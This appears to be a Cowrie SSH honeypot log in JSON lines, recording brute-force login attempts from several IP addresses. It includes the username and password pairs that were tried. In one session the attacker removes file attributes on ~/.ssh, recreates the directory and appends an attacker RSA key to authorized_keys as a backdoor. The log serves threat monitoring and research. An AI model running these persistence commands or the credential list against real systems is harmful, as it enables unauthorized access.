{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:24.795393Z","src_ip":"211.22.25.164","session":"bed568852a5a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:11:25.798875Z","src_ip":"211.22.25.164","session":"bed568852a5a"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:26.040124Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:26.041106Z","src_ip":"211.22.25.164","session":"bed568852a5a"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":48819,"dst_ip":"1.2.3.4","dst_port":22,"session":"d56d2d06275c","protocol":"ssh","message":"New connection: 154.209.4.55:48819 (1.2.3.4:22) [session: d56d2d06275c]","sensor":"my-vps","timestamp":"2025-09-09T04:11:34.669960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:34.680974Z","src_ip":"154.209.4.55","session":"d56d2d06275c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:34.885228Z","src_ip":"154.209.4.55","session":"d56d2d06275c"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123123","message":"login attempt [deploy/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:11:35.713817Z","src_ip":"154.209.4.55","session":"d56d2d06275c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:36.930493Z","src_ip":"154.209.4.55","session":"d56d2d06275c"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":54748,"dst_ip":"1.2.3.4","dst_port":22,"session":"78b2a0fc807f","protocol":"ssh","message":"New connection: 192.210.135.20:54748 (1.2.3.4:22) [session: 78b2a0fc807f]","sensor":"my-vps","timestamp":"2025-09-09T04:11:51.215717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:51.216648Z","src_ip":"192.210.135.20","session":"78b2a0fc807f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:51.325841Z","src_ip":"192.210.135.20","session":"78b2a0fc807f"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T04:11:51.803796Z","src_ip":"192.210.135.20","session":"78b2a0fc807f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:52.915681Z","src_ip":"192.210.135.20","session":"78b2a0fc807f"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":42252,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c26f3c7500d","protocol":"ssh","message":"New connection: 51.81.118.153:42252 (1.2.3.4:22) [session: 8c26f3c7500d]","sensor":"my-vps","timestamp":"2025-09-09T04:11:54.328632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:54.329297Z","src_ip":"51.81.118.153","session":"8c26f3c7500d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:54.425473Z","src_ip":"51.81.118.153","session":"8c26f3c7500d"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1.123","message":"login attempt [user1/user1.123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:11:54.851045Z","src_ip":"51.81.118.153","session":"8c26f3c7500d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:55.950057Z","src_ip":"51.81.118.153","session":"8c26f3c7500d"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":45980,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6e862a9e445","protocol":"ssh","message":"New connection: 152.32.190.168:45980 (1.2.3.4:22) [session: d6e862a9e445]","sensor":"my-vps","timestamp":"2025-09-09T04:12:13.265642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:13.266646Z","src_ip":"152.32.190.168","session":"d6e862a9e445"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:13.464728Z","src_ip":"152.32.190.168","session":"d6e862a9e445"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"qwerty","message":"login attempt [monitor/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T04:12:14.295362Z","src_ip":"152.32.190.168","session":"d6e862a9e445"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:15.495196Z","src_ip":"152.32.190.168","session":"d6e862a9e445"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":33264,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c471951ef8e","protocol":"ssh","message":"New connection: 211.22.25.164:33264 (1.2.3.4:22) [session: 6c471951ef8e]","sensor":"my-vps","timestamp":"2025-09-09T04:12:26.699447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:26.700101Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:26.940290Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.login.success","username":"root","password":"bloemetje","message":"login attempt [root/bloemetje] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:12:27.942376Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:28.483322Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:12:28.484105Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:12:28.485190Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:28.726214Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:12:29.224370Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:12:29.225157Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:12:29.467844Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:29.468795Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":33276,"dst_ip":"1.2.3.4","dst_port":22,"session":"533102009f4f","protocol":"ssh","message":"New connection: 211.22.25.164:33276 (1.2.3.4:22) [session: 533102009f4f]","sensor":"my-vps","timestamp":"2025-09-09T04:12:29.707020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:29.707886Z","src_ip":"211.22.25.164","session":"533102009f4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:29.947706Z","src_ip":"211.22.25.164","session":"533102009f4f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:12:30.951286Z","src_ip":"211.22.25.164","session":"533102009f4f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:32.193588Z","src_ip":"211.22.25.164","session":"533102009f4f"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":54976,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f8f7c6114b5","protocol":"ssh","message":"New connection: 211.22.25.164:54976 (1.2.3.4:22) [session: 0f8f7c6114b5]","sensor":"my-vps","timestamp":"2025-09-09T04:12:32.432940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:32.433612Z","src_ip":"211.22.25.164","session":"0f8f7c6114b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:32.674001Z","src_ip":"211.22.25.164","session":"0f8f7c6114b5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:12:33.672995Z","src_ip":"211.22.25.164","session":"0f8f7c6114b5"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:33.916157Z","src_ip":"211.22.25.164","session":"6c471951ef8e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:33.917333Z","src_ip":"211.22.25.164","session":"0f8f7c6114b5"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":33392,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb5dd59354df","protocol":"ssh","message":"New connection: 154.209.4.55:33392 (1.2.3.4:22) [session: eb5dd59354df]","sensor":"my-vps","timestamp":"2025-09-09T04:12:40.842527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:12:40.851944Z","src_ip":"154.209.4.55","session":"eb5dd59354df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:12:41.051096Z","src_ip":"154.209.4.55","session":"eb5dd59354df"}
{"eventid":"cowrie.login.failed","username":"db","password":"0","message":"login attempt [db/0] failed","sensor":"my-vps","timestamp":"2025-09-09T04:12:41.854631Z","src_ip":"154.209.4.55","session":"eb5dd59354df"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:12:43.063571Z","src_ip":"154.209.4.55","session":"eb5dd59354df"}
